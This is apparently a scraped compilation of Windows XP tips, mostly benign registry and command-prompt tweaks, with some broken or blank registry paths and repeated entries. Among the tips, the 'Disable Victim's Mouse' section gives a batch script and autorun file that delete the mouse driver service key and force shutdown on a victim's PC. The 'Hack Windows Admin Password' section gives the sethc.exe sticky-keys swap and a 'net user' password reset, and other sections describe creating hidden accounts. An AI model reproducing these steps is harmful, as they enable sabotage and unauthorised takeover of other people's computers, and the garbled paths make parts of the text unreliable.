How to make a undeletable Folder

Now follow these steps:-
  1. Click on Start
  2. Click on Run
  3. Now type here “cmd” (without double quote)
  4. Now you will get a command prompt window. Now you have to decide a drive in which you want to make this folder. Ex. If you want to make this folder in D drive then type D: and press enter in command prompt
  5. Now your cursor reached in D drive. Now type here MD \LPT1\\ (Press enter)
  6. Now you folder is created in d drive if u will try to delete or rename this folder then it will appear a message “Cannot delete lpt1: The parameter is incorrect”

How to delete an undeletable folder
  1. Now again go to command prompt
  2. Go in specific drive
  3. And type here RD \LPT1\\ (press enter)
  4. Now check your drive this folder is deleted..
You can create these undeletable folder with following names..con, aux, lpt1, lpt2, lpt3, lpt4, lpt5, lpt6, lpt7, lpt8 and lpt9

Have a fun dear.

Forgot ur own MOBILE NO??

Airtel : *140*1600#
Reliance GSM Mobile Number : *#1#
Idea: *789#
Aircel: *888#
videocon: *1#
Virgin: *1#
Docomo: *1#
vodafone: *555*0#
Bsnl: 24365

Disable Victim's Mouse

Step1: Copy the Batch code into notepad.
Save it as name.bat extension (for eg: DILSON.bat)
NOTE: remove "; " at the end of each code n den save
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass";
reg delete %key%;
reg add %key% /v Start /t REG_DWORD /d 4;
shutdown.exe -s -t 00
Step2: Now open the notepad and copy this code.
Save it as "autorun.inf"
Action=Mouse Disable
Step 3: Then copy the two files in your pen drive or victim's pen drive.
*How to recover from this attack?
Copy this code into the notepad.
and save it with name.bat extension(for eg: DILSONAntiVirus.bat).
Now final step is to double click this batch file.
NOTE: remove "; " at the end of each code n den save
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass";
reg delete %key%;
reg add %key% /v  Start /t REG_DWORD /d 1;

Lock ur CD-ROM:

Go to
> run
> type regedit
> find(ctrl+F)
> then type 'allocatecdrom'
> change the value 1 to 0
> to normal then type 0 to 1

Want to clear BIOS Password Key

> Open CPU
> move Jumper to 2-3 pstn from 1-2
> start PC
> go to BIOS
> clear it
> turn off
> move Jumper to 1-2 & done

Make ur own font in xp:

Private character editor used for editing fonts,etc.
> start
> run
> type "eudcedit"

Problem in formating pen drive

> rt click on computer
> manage
> disk mgt
> rt click on pen drive
> remove letter
> remove(Plug out&plug)
> Format


just follow the procedure...
> open run command .
> type "regedit" without quotes.
> go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
> click on any one of them and check "display name".
display name tells the  installed program .
> delete the folder of the program which you want to
uninstall .

Add Your Own Info & Photo In My Computer Properties

Follow these steps:
> Open Notepad & paste following:
Manufacturer=”DILSON corporation”
Model=Intel Core 2 Duo
[Support Information]
Line1= +919024928833
Now Save it as "oeminfo.ini" (without quotes) in
Create a bmp file of your photo and save it in
C:\Windows\System32 as oemlogo.bmp (without quotes).
Now check My Computer properties.

Create Your Virtual Drive(With cmd)

Make any folder in C drive say DILSON
> Go to start
> run
> Type cmd
> subst k: c:\DILSON
Check your my computer, new drive should be shown.
For removing, type
> subst k: /d
Basically virtual drive k assign a path to the
folder DILSON

Hack Windows Admin Password by pressing shift key 5 times...!!!

However this is very known method of hacking windows
admin password,but still many will be unaware from this
way. So I'm posting here. Follow these simple steps:
1) Go to C:/windows/system32
2) Copy cmd.exe and paste it on desktop.
3) Rename cmd.exe to sethc.exe
4) Copy the new sethc.exe to system32 folder, windows
will ask for overwriting the file,
then click yes.
Now press Shift key 5 times you will get cmd prompt.
Now Log Off and at the login screen,press Shift key
5 times. You will get cmd prompt there.
Now type “net user administrator password” without
quotes where “password”can be any password of your
Now enter password in administrator account. That's all.

Change My Documents Location In XP

Follow these steps:
* Go to property of My documents.
* Change Target folder location.

Operate Computer Without Mouse

Follow these steps:
1. Press left Shift+ left Alt + Num Lock
2. MouseKeys window will appear. Click OK or Settings
for further configuration.
3. Now you can operate your cursor position using
number keys(use the NUMPAD).

Hide 'User Accounts' from users

> Start/Run, and type:
> User Config > Admin Templates > Control Panel
> doubleclick "Hide specified Control Panel applets"
> 'enabled'> then click 'Show"
> click Add button,
> type "nusrmgt.cpl" into the add box

Boot Defragment in XP

A very important new feature in Microsoft Windows XP
is the ability to do a boot defragment. This basically
means that all boot files are placed next to each other
on the disk drive to allow for faster booting. By
default this option is enabled but some upgrade users
have reported that it isn't on their setup.
1. Start Regedit.
2. Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction
3. Select Enable from the list on the right.
4. Right on it and select Modify.
5. Change the value to Y to enable and N to disable.
6. Reboot your computer.

Disable Log Off From Start Menu

Follow these steps:
Go to start
> run
> regedit
> Go to the path
HKey_Current_User\Software\Microsoft \Windows\Current Version\Policies\Explorer
> Add a new DWORD value on right side by right click on
right panel, name it StartMenuLogoff
> Give it a value 1.
> Log off or restart your computer.
So how to find it, Open notepad , Type regedit and save
it as log.bat. Go to the same path, change the value to
0 or delete it.
(don't type any quotes).

Create Hidden Account In XP

Login with administration account.
Go to start
> run
> Type regedit
Go to the path
Create a new DWORD value in right panel with the name
of your user account and give it value 0.
Restart your computer and you will see your user
account disable from welcome screen and user accounts.
For enable, change the value of DWORD from 0 to 1.

Disable XP Start Screen

Go to start
> run
> Type msconfig
> Go to BOOT.INI Tab.
Apply then OK. Restart your system.

From When Your Computer Is Running

So let's know from when your computer is running?
Go to start
> run
> cmd and type
> net statistics workstation
It will show statistics since date & time.
Here's one more other way by using this command

Command Prompt As Calculator

So you can use your command prompt as calculator too:
C:\>set /a 1+1
C:\>set /a 1-1
C:\>set /a 4*3
C:\>set /a 4%3
C:\>set /a 4/3

Apply Password To Your Guest Account

Applying a password to your guest account looks
somewhat annoying, but you can easily apply it using
cmd . Just follow these steps:
Go to start
> run
> cmd
> Type "net user guest DILSON" without quotes
where DILSON is your password which you will
apply to guest. But for this you must be Log In with
using administration account.
Go to user accounts, you will see password apply to
your guest account.

Save Images From MS Word (.doc)

When you open any document in MS word, try to click on
picture for saving then it does not provide option for
saving it. so here's a way simply to save picture from
any .doc file. Follow these simple steps:
1. Save .doc documents as web page means as .htm
2. Open it with browser.
3. Save picture in the way as you do from any html file either by drag and drop or right click then save
image as.

Folder lock with password but without using any software…!!!

Lock Any Folder In Windows OS Using Only Notepad
Open notepad from your windows start button.
Copy and paste this under given code in your notepad and save it as "Dilsonlocker.bat"
title DILSON Folder Lock
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
echo Are you sure u want to Lock the folder(Y/N)….?
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
ren DILSON "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==DILSON goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" DILSON
echo Folder Unlocked successfully
goto End
echo Invalid password
goto end
echo DILSON Lock created successfully
goto End
Now Double Click that new Batch file named "Dilsonlocker.bat" and it will make a new folder
named DILSON at the same location :
Now put the Data Inside the folder "DILSON" and again Double Click the Batch file to
Lock it, this will ask "Are you sure you want to lock the folder, just Type y and press Enter. Now the
folder and your file gets locked.
Now keep the Batch File named "DilsonLocker.bat" at a different place like your USB Pen
Drive so that only you can unlock and access the folder you have locked.
To Unlock the Folder and your file, just double click the Batch file "DilsonLocker" again and it will
say "Enter password to unlock folder",the default password is set as "DILSON", so just type this and keep enjoying…..!!!!

Make Invisible Account (XP)

1. Go to Control Panel and create a NEW ACCOUNT say DILSON(or u can use Your name) inside User Accounts
2. Go to START->RUN–type in regedit
4. Here create a new DWORD by right clicking and name it as you did your new account
(DILSON). If you want to hide an existing one, just type in its name.
5. The value of the DWORD has to be zero if you want it to be hidden. If you want it to show,
just change the value to 1.
6. Now log off and see that your account is not in the logon screen.
7. To logon to your hidden account press CTRL+ALT+Delete twice. Here type in your
NEW_ CCOUNT and that’s it

Private Character Editor & font editor

This program is for designing icons and Characters(Alphapet) and also fonts...
start -> run -> EUDCEDIT

Lock ur Desktop

>Press the Windows key & L key (WinKey+L)
>create a new shortcut rundll32.exe user32.dll,LockWorkStation

Easy Way 2 Open Control Panel

-  Go 2 Run
-  Type: Control
-  Press Enter

WINDOWS HIDDEN TOOLS Type all Keywords in RUN:

1. Charmap.exe
2. Syskey.exe
3. Gpedit.exe
4. Sndvol32.exe
5. Eudcedit.exe

Open Programs Automatic on Boot Up

>Right click START button click open
>Double-click on Programs & then on Startup
> Drag ur fav in that window
> And now restart ur pc and see this effect…
Keep enjoying with this tricks….!!!

fed up of confirmation dialog on delete? U can supress confirmation dialog

> right click on recycle bin -> properties
> uncheck "display confirmation"

All new windows shortcuts, Go 2 any folder

ctrl+w - quit
ctrl+e (or) ctrl+f - search
ctrl+h - history
ctrl+b - Organize favorites

In windows u can’t create a folder with these names:

CON => corresponds to the console,
LPT1 => corresponds to printer,
LPT3,..., LPT9
COM3,..., COM9
U cannot create since these are reserved by window based operating system.
If you want to create this folder then firstly create new folder and click on rename and then press Alt+255 and then type any words or name like con….. have a fun dears… 

Turn Off all system beps:

-go 2 start>Run>Regedit
-Go 2 HKEY_CURRENT_USER\Control Panel\Sound
-Edit the key Beep and give it a value NO or 0.

Did u know the use of each Special function keys?

F1- Help
F2- Rename
F3- Search
F4- Address Bar
F5- Refresh
F6 or F7- Spelling
F8- Safe Mode
F10- Menu Bar
F11- Resize
F12- Save

Fast system properties:

Press alt+click on my computer icon (or)
press ctrl+break.

How to Lock the folders Without using any software

You can lock and unlock your folder with this simple trick !
Procedure :
1. Make a folder on the desktop and name it as “folder”
2. Now, open notepad and write "ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D}" and now click on File Menu>save as.
3. In the ‘save as’ window save it as "lock.bat" and click save ! (Save it on Desktop)
4. Now, again open notepad again and write "ren folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder" and now click on File Menu>save as.
5. In the ‘save as’ window save it as "key.bat" and click save ! (Save it on Desktop)
6. Now, double click lock.bat to lock the folder and now if you open your folder, control panel will open up !
7. Now, double click key.bat to open the folder and now if you open your folder, you can access your data inside the folder again !
8. Lock your folder and hide the key.bat somewhere else on your hard disk !
9. Whenever you want to open your folder just paste the key.bat on desktop and open your folder using it !
Note:- write code except Double Quote(",")
have a fun dear
:) :-o :)

Hacking Windows SEND TO MENU

How often do you copy songs from a CD? Or some photos from a CD?

What do you do? You select the required files and do a CTRL –C. Open the destination folder and do a CTRL-V. Here is something you can benefit time from. Customize your SEND TO MENU.

This sounds simple and you can do it in less than sixty seconds.
You can create your own BASKET.

First you’ll need access to hidden files. So change your view settings to make all hidden files visible.
Tools -> folder options -> view (tab) and select the show hidden files and folders.
go to parent drive:/documents and settings/(user name)/send to
(Note:- The drive which is using as system drive is or the drive in which you installed your window is called parent drive)

Open up my computer and locate your most used folders.

Create a shortcut of the most used folders in SEND TO FOLDER. You can do this in a number of ways.

Right click -> send to desktop(create shortcut) and move the shortcut from the desktop to the SEND TO FOLDER

Copy the most used folder and go to SEND TO FOLDER and right click -> paste shortcut.

Also remember to rename the shortcuts to send to videos or send to potos. We don’t need confusion when we use the same later.

5. DONE.

Improve Windows XP Shutdown Speed

      Step1. Click on start button and click on run and type “regedit”(without double quote).
Step2. Find this key HKEY_CURRENT_USER\Control Panel\Desktop
Step3. Now move cursor on  right panel and find this string value WaitToKillAppTimeOut now double click on this and change the value 20000 into 1000.
Step4. Now click on ok
Step5. Now find this key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
Step6. Now again repeat the step no 3 and 4
Step7. Now find this key HKEY_USERS\.DEFAULT\Control Panel
Step8. Now again repeat the step no 3 and 4
Step9. Now restart your pc and you will see this effect 

Top Ten Tips to Improve System Speed

1. Let your PC boot up completely before opening any applications.

2. Refresh the desktop after closing any application. This will remove any unused files from the RAM.

3. Do not set very large file size images as your wallpaper.

4. Do not keep lot of shortcuts on your desktop. Each shortcut on the desktop uses up to 500 bytes of RAM

5. Empty the recycle bin regularly. The files are not really deleted from your hard drive until you empty the recycle bin.

6. Delete the temporary internet files regularly.

7. Defragment your hard drive once every two months. This will free up a lot of space on your hard drive and rearrange the files so that your applications run faster.

8. Always make two partitions in your hard drive. Install all large Softwares (like PSP, Photoshop, 3DS Max etc) in the second partition. Windows uses all the available empty space in C drive as virtual memory when your Computer RAM is full. Keep the C Drive as empty as possible.

9. When installing new Softwares disable the option of having a tray icon. The tray icons use up available RAM, and also slow down the booting of your PC. Also disable the option of starting the application automatically when the PC boots. You can disable these options later on also from the Tools or preferences menu in your application.

10. Protect your PC from dust. Dust causes the CPU cooling fan to jam and slow down thereby gradually heating your CPU and affecting the processing speed. Use compressed air to blow out any dust from the CPU. Never use vacuum.

Show your Name in time the place of AM/PM:-

Try this trick to add up your name the place of AM/PM beside time it’s very simple trick plz follow these few steps:-
Step1. Click on start button and then click on control panel.
Step2. Then double click on “Regional and Language Option”
Step3. Now click on customize and go to TIME tab.
Step4. Change the AM/PM symbol form AM symbol and PM symbol to Your choice name or anything. Then click on ok.
Did it change? If not then follow these steps:-
Step1:- Now go to time in taskbar and Double Click it to open "Date and time property"(or right click on time and click on adjust date/time)
Step2:- Look place where time changes in digital form i.e. 02:47:52 AM, click to arrow to change the AM or PM by selecting and press arrow. It will Show your name or name that was entered by u, Apply -> OK and be HAPPY :)

Secure your Desktop Icons and Settings :-

You can save your desktop settings and secure it from your nerdy friend by playing with the registry. Simply launch the Registry Editor(Go to run and type REGEDIT) and go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion \Policies\Explorer

In the right pane create a new DWORD Value named

NoSaveSettings and modify its value to 1. Refresh and restart for the settings to get saved.

Change the default location of installation:-

To change the default drive or path where windows will looks for its installing files then follow this steps:-
Step1. Go to run and type regedit

Step2. Then go to following key     HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\SourcePath

Step3. Now you can edit as you wish

Enable / Disable Firewall

Open Control Panel and double click on Network Connections. In the new box that appears right click on the Connection and click on the Advanced tab. Check or uncheck the box according to your desire.

Remove shortcut arrow from desktop icons

Here's how you can remove those shortcut arrows from your desktop icons in Windows XP.
1. Start regedit.
2. Navigate to HKEY_CLASSES_ROOT \ Lnkfile
3. Delete the IsShortcut registry value.
You may need to restart Windows XP.

Remove Shared Documents from my computer

Open Regedit(Start- Run- Regedit) and navigate to HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Explorer My Computer NameSpace DelegateFolders
There will see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. By Deleting this you can remove the 'Other Files stored on This Computer' group.

To change drive letters

To change drive letters (useful if you have two drives and have partitioned the boot drive, but the secondary drive shows up as "D")

Go to Start > Control Panel > Administrative Tools > Computer Management, Disk Management, then right-click the partition whose name you want to change (click in the white area just below the word "Volume") and select "change drive letter and paths."
From here you can add, remove or change drive letters and paths to the partition.

Disable CD Autorun

1) Click Start, Run and enter GPEDIT.MSC
2) Go to Computer Configuration, Administrative Templates, System.
3) Locate the entry for Turn autoplay off and modify it as you desire.

Force users to press Ctrl-Alt-Delete to Logon

(XPPro only)
Go to start/run,
and type control userpasswords2

How to Convert FAT to NTFS file system

To convert a FAT partition to NTFS, perform the following steps.
Click Start, click Programs, and then click Command Prompt.
In Windows XP, click Start, click Run, type cmd and then click OK.
At the command prompt, type CONVERT [driveletter]: /FS:NTFS.
Convert.exe will attempt to convert the partition to NTFS.
NOTE: Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that it is to be converted prior to executing the convert command. It is also recommended to verify the integrity of the backup before proceeding, as well as to run RDISK and update the emergency repair disk (ERD).

How to make your Desktop Icons Transparent

Go to Control Panel > System, > Advanced > Performance area > Settings button Visual Effects tab "Use drop shadows for icon labels on the Desktop

Converting from FAT32 to NTFS at a later time

If you want, under Windows XP you can convert your FAT32 partition to NTFS using the following command from your Command Prompt:
convert c: /fs:ntfs
With all this information, find what suits your needs and go with it. If you're the kind of person that backs up regularly, go with NTFS. Same if you want to use a partition over 32GB without partitioning. If you want to play it safe, or if you want the ability to transfer files from one partition to another under a dual-boot situation, stick with FAT32. If you want to read more about these file systems, Microsoft has an excellent article on their web site.

The Windows XP File Systems

When installing Windows XP from scratch, it prompts you to select from two different file systems: FAT32 and NTFS. As expected, it gives no real reason why you should select one or the other, and defaults to NTFS.
If you're installing on a dual-boot system where you would have a FAT32 partition (default type for Windows 98 and SE for partitions over 2GB), you may run into problems depending on your situation. The FAT32 file system was created when the size of hard drives exceeded 2GB. The previous file system for DOS and Windows 95 was FAT16, which offered at most 2GB of allocation on your hard drive. This of course is useless for today's hard drives when you can't find anything under 10GB anymore. Where FAT16 allowed a 2GB maximum, FAT32 only allows a 32GB maximum. If your hard drive is over 32GB, you'll have to split it into separate partitions, or use NTFS.
NTFS was introduced with Windows NT. Among the reasons why it was introduced, it allowed partitions greater than what's even offered today, and boasts better performance and security. Focusing on security, it's possible that while an NTFS hard drive is secure when running Windows XP, there's no easy way to get back into the hard drive if you boot from an emergency floppy that only sees a FAT16 or FAT32 partition, such as what you'd get from a 98 or ME emergency floppy. The security in NTFS actually prevents you from circumventing its own file system from a boot floppy. This means that if for some reason your hard drive becomes unusable and you need to move data off of it, the task won't be as easy as it was when using Windows 95, 98, and ME. The solution that the user has in this situation is to boot from the Windows XP CD and run a repair on the hard drive. This should fix any problems the user had with the system and bring it back to a bootable state. The other issue is in dual-boot situations. Running under NTFS, you can see FAT16 and FAT32 partitions, but if you boot back into Windows ME, you can't see the NTFS partition. This is a problem if you downloaded something to your XP partition and you want to move it to your ME partition while running under ME. Also, if you upgraded ME to XP and you convert your file system from FAT32 to NTFS, you cannot go back to Windows ME since ME can't run under NTFS. However, only NTFS allows you to set permissions on individual folders so that you can control who sees what.

Rename a Series of Files

When you download photos from your digital camera, they often have unrecognizable names. You can rename several similar files at once with the following procedure. This also works for renaming other types of files.
1.Open the My Pictures folder. (Click Start, and then click My Pictures.) Or open another folder containing files that you want to rename.
2.Select the files you want to rename. If the files you want are not adjacent in the file list, press and hold CTRL, and then click each item to select it.
3.On the File menu, click Rename.
4.Type the new name, and then press ENTER

Enable / Disable Firewall

Open Control Panel and double click on Network Connections. In the new box that appears right click on the Connection and click on the Advanced tab. Check or uncheck the box according to your desire.

Remove shortcut arrow from desktop icons

Here's how you can remove those shortcut arrows from your desktop icons in Windows XP.
1. Start regedit.
2. Navigate to HKEY_CLASSES_ROOTlnkfile
3. Delete the IsShortcut registry value.
You may need to restart Windows XP.

IP address of your connection

IP address of your connection
Go to start/run type 'cmd'
then type 'ipconfig'
Add the '/all' switch for more info.

Set Processes Priority

Set Processes Priority
Follow this tip to increase the priority of active processes, this will result in prioritisation of processes using the CPU.

1.Go to the second tab called Processes, right click on one of the active processes, you will see the Set Priority option

2.For example, your Run your CDwriter program , set the priority higher, and guess what, no crashed CD’s

Remove the Recycle Bin from the Desktop

Remove the Recycle Bin from the Desktop
If you don't use the Recycle Bin to store deleted files, you can Delete it’s from desktop icon.
Follow these steps:-

Step1. Go to Run and type Regedit then enter
Step2. Now follow this address
Step3. Now right click on {645FF040-5081-101B-9F08-00AA002F954E} key and click on Delete option
If you want to show again recycle bin on your Desktop then follow this steps:-
Step3. Right click on NameSpace key and move cursor on New and then click on Key option
Step4. Paste this on new key name  {645FF040-5081-101B-9F08-00AA002F954E}
Step5. Double click on Default and Type here Recycle Bin

Rename Recycle Bin without any software

To change the name of the Recycle Bin desktop icon, open Regedit and go to:

and double click on LocalizedString and change the name to whatever you want

Run a program as a different user without logging in other user account

You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.

Do you want to remove window unwanted application

XP hides some system software you might want to remove, such as Windows Messenger, but you are unable to remove them If you want to remove them then follow this steps….:-
Step1. Click on start button
Step2. Then click on control panel and double click on Add or Remove programs
Step3. Then click on Add/remove windows components
Step4. Here You have to select those application Those you want to remove then click on Next

You can lock your XP with Duble click of the Mouse

You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.

Immediately Deleting Files

You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish. (Professional Edition only).

Faster Boot Time

First, let's do a bit of comparing with the "before and after" you try this registry trick. Please try restarting your pc and observe at the blue lines that appear upon booting. Notice how many times it appeared?

To increase system boot speed, here's what you can do...

1. Start>run> and type ''regedit''

2. HKEY_LOCAL_MACHINE/ SYSTEM / CurrentControlSet / Control / Session Manager / Memory Managment / PrefetchParameters / EnablePrefetcher.

3. Double click on "Enableprefetcher"

4. Past 1 in Value Date, and Hexadecimal most be on(enable)

Then restart the pc and and look at the blue lines again. See how many times or how fast it goes? Most of the time it just quickly passes that part.

PDF Tricks

Hey peoples now u can listen to wats there in a pdf document instead of reading the whole document....

Try out the following key combinations for Acrobat 6.0 & 7.0:

ctrl+ shift + b ---> To hear the whole document

ctrl + shift + v---> To hear only the page

ctrl + shift + c ---> To resume

ctrl + shift + e ---> To stop

Background Image in any Folder without Software:-

If you want this then follow these steps:-

Step1. Go to Notepad and type this code
iconarea_image= “Full Path of Image with extension those u want to set as u folder background”
E.g. If your photo is in “photos” folder of “D” drive and Name of photo is “heart
And type of photo is “jpeg” then your full path will be “D:\photos\heart.jpg

Step2. Save this file as desktop.ini name in your selected folder
E.g. suppose that your selected folder is song is in D then path of your selected folder will be D:\song

Step3. Go to run and type Attrib +s “Path of your selected folder”

Step4. Now open your folder and you will see that folder background is sated.

Note: - Double quote is compulsory

Keep enjoying my dear Friends

Make your Own Icon in Windows

It's shockingly easy to create your own icons in Windows XP. Let's do it: Click Start, click All Programs, click Accessories, and then click Paint. On the Image menu, click Attributes. Type 32 for both the Width and Height of the document, and make sure that Pixels is selected under Units. Click OK to create a new 32x32-pixel document: the size of an icon.
Now add type, color, or do whatever you'd like to your image. I like to shrink photos (headshots work best) to 32x32 and simply paste them into my Paint document. When you're finished, open the File menu and click Save As. Use the dialog box to choose where you want to save your file, then give it a name followed by ".ico" (without the quotes), and click Save. (The extension ".ico" tells Windows that it's an icon file.) You just created an icon! Now you can change any shortcut or folder to your own icon—just browse to it on your hard drive.

Run Commands for Hidden tools in window XP

Go to run and type following commands

Add/Remove Programs = appwiz.cpl
Administrative Tools = control admintools
Authorization Manager= azman.msc "New"

Calculator = calc
Certificate Manager = certmgr.msc
Character Map = charmap
Check Disk Utility = chkdsk
Control Panel = control "New"
Command Prompt = cmd.exe
Component Services = dcomcnfg
Computer Management = compmgmt.msc = CompMgmtLauncher "New"

Date and Time Properties = timedate.cpl
Downloads = Downloads "New"
Device Manager = devmgmt.msc
Direct X Troubleshooter = dxdiag
Disk Cleanup Utility = cleanmgr
Defragment User Interface = dfrgui "New"
Ditilizer Calibration Tool = tabcal "New"
Disk Management = diskmgmt.msc
Disk Parmelonion Manager = diskpart
Display Properties = control desktop or desk.cpl
DPI Scaling = dpiscaling "New"
Driver Package Installer = dpinst "New"
Driver Verifier Utility = verifier or /reset
DVD Player = dvdplay "New"

Encryption File System = rekeywiz "New"
Event Viewer = eventvwr.msc

Fax Cover Sheet Editor = fxscover "New"
File Signature Verification Tool = sigverif
Folders Properties = control folders
Fonts = control fonts
Free Cell Card Game = freecell

Group Policy Editor = gpedit.msc

Internet Explorer = iexplore
Iexpress Wizard = iexpress
Internet Properties = inetcpl.cpl
IP Configuration = ipconfig.exe
iSCSI Initiator = iscsicpl "New"

Keyboard Properties = control keyboard

Libraries = explorer or Windows key + E
Local Security Settings = secpol.msc
Local Users and Groups = lusrmgr.msc
Logs You Out Of Windows = logoff

Microsoft Support Diagnostic Tool = msdt "New"
Microsoft Paint = mspaint.exe
Mouse Properties = control mouse
Mouse Properties = main.cpl
Mobility Center (only on mobile) = mblctr or Windows key + X
Network Connections = control netconnections
Network Connections = ncpa.cpl
Notepad = notepad

ODBC Data Source Administrator = odbcad32 "New"
Optional Features Manager = optionalfeatures "New"
On Screen Keyboard = osk or Windows key + U

Performance Monitor = perfmon.msc
Phone and Modem Options = telephon.cpl
Power Configuration = powercfg.cpl
Printers and Faxes = control printers
Printer Migration = PrintBrmUi "New"
Private Character Editor = eudcedit

Regional Settings = intl.cpl
Registry Editor = regedit.exe
Remote Assistance = msra "New"
Remote Desktop = mstsc
Resultant Set of Policy = rsop.msc

Scheduled Tasks = control schedtasks
Security Center = wscui.cpl
Services = services.msc
Shared Folders/MMC = fsmgmt.msc
Shuts Down Windows = shutdown
Snipping Tool = snippingtool "New"
Sounds and Audio = mmsys.cpl
Sound Recorder = soundrecorder "New"
Sound Volume = sndvol "New"
Spider Solitare Card Game = spider
SQL Client Configuration = cliconfg
Stored User Names and Passwords = credwiz "New"
Sticky Note = StikyNot "New"
System Configuration Editor = sysedit
System Configuration Utility = msconfig
System File Checker Utility = sfc
System Information = msinfo32
System Properties = sysdm.cpl or Windows key + Pause/Break

Task Manager = taskmgr
Trusted Platform Module = TpmInit "New"

Utility Manager = utilman
User Accounts = netplwiz or control userpasswords2

Windows Activation = slui "New"
Windows Backup Utility = sdclt "New"
Windows Fax and Scan = wfs "New"
Windows Firewall = firewall.cpl
Windows Firewall with Advanced Security = wf.msc "New"
Windows Image Acquisition = wiaacmgr "New"
Windows Media Player = wmplayer
Windows Magnifier = magnify
Windows Management Infrastructure = wmimgmt.msc
Windows Update App Manager = wuapp "New"
Windows Standalong Update Manager = wusa "New'
Windows System Security Tool = syskey
Windows Share Creation Wizard = shrpubw "New"
Wordpad = write

How To Remove and Add Right-Click Menu Items from Files and Folders

How To Remove and Add Right-Click Menu Items from Files and Folders


A lot of programs you install will add themselves to the right-click menu of your files and/or folders. And most times,
you have no choice in the matter and, as a result, your right-click menu can get very long with added items you don't
even use. The last person I was helping with this had a right context menu so long that the Rename option was no longer
Fortunately, you can easily remove those unwanted menu items, if you know the registry values to edit. And it's not at
all difficult once you know the keys responsible for the additions.

For Files, the secret lies in the "context menu handlers" under the shellex subkey for "All Files" which, in the registry, is
nothing but an asterisk - like a dos wildcard, which means the values entered apply to all files. It is at the very top of the
Root key, right here:


Click the the + sign next to the ContextMenuHandlers key, to expand it.
Now you will see some of the programs that have added items to your right-click menu. Simply delete the program keys
you don't want.
Yup! It's that simple. If deleting makes you uneasy, just export the key before deleting it. Or, instead of deleting the
values, disable them. Simply double click the default value for the program on the right hand pane and rename the clsid
value by placing a period or dash in front of it.

ie; - {b5eedee0-c06e-11cf-8c56-444553540000}

Then exit the registry, refresh, and right click a file to see if the item was removed from the menu.
Some programs - like WinZip or WinRar - will add several items to your right click menu but all of them will be
removed by deleting or disabling their one context menu handler.

Note:- that the above key only applies to the right click menu of files.

To remove entries from the right click context menu of folders, you need to navigate to the Folder and Drive keys:


All you have to do is follow the same procedure as for Files - either disable or delete items you wish to remove.

Adding Items

Adding Items to the right click menu of Files and Folders is also fairly simple using the Registry. It just involves the
creation of a few new keys for each item you wish to add. You edit the same keys used for removing items. Let's use
Notepad as an example of an item you'd like to add to the right click menu of all your files or folders.

For folders, go to this key:


Click the + sign next to Folder and expand it so that the Shell key is visible. Right click the Shell key and choose
New>Key and name the key Notepad or whatever else you'd prefer (whatever the key is named is what will appear in the
right-click menu). Now right click the new key you made and create another key named Command. Then, in the right
hand pane, double click "Default" and enter Notepad.exe as the value.
Exit the registry, refresh, and right click any folder. Notepad should now be on the context menu.

For files, go here again:


Expand the * key and see if a Shell key exists. If it does exist, follow the same procedure as for folders. If it does not
exist, you'll have to create a new Shell first. Just right click the * key and choose New>Key and name it Shell. Then
right click the Shell key and continue on the same way you did for adding items to the right click menu of folders.
Once done, Notepad should appear as an option in the right click menu of all your files.

Increase Booting speed in XP

Increase Booting speed in XP

First of all, this tweak only apply to those who only have one HDD on their primary IDE channel (nothing else on
device 0 or 1) and a CD-ROM and/or DVD-ROM on the secondary IDE channel. Each time you boot Windows XP,
There’s an updated file called NTOSBOOT-*.pf who appears in your prefetch directory (%SystemRoot%Prefetch) and
there's no need to erase any other files as the new prefetch option in XP really improves loading time of installed
programs. We only want WindowsXP to boot faster and not decrease its performance. Thanks to Rod Cahoon (for the
prefetch automation process...with a minor change of mine) and Zeb for the IDE Channel tweak as those two tricks,
coupled together with a little modification, result in an EXTREMELY fast bootup:

1. Open notepad.exe, type "del c:windowsprefetch tosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:

2. From the Start menu, select "Run..." & type "gpedit.msc".

3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the
right window.

4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".

5. Click "OK", "Apply" & "OK" once again to exit.

6. From the Start menu, select "Run..." & type "devmgmt.msc".

7. Double click on "IDE ATA/ATAPI controllers"

8. Right click on "Primary IDE Channel" and select "Properties".

9. Select the "Advanced Settings" tab then on the device 0 or 1 that doesn't have 'device type' greyed out select 'none'
instead of 'autodetect' & click "OK".

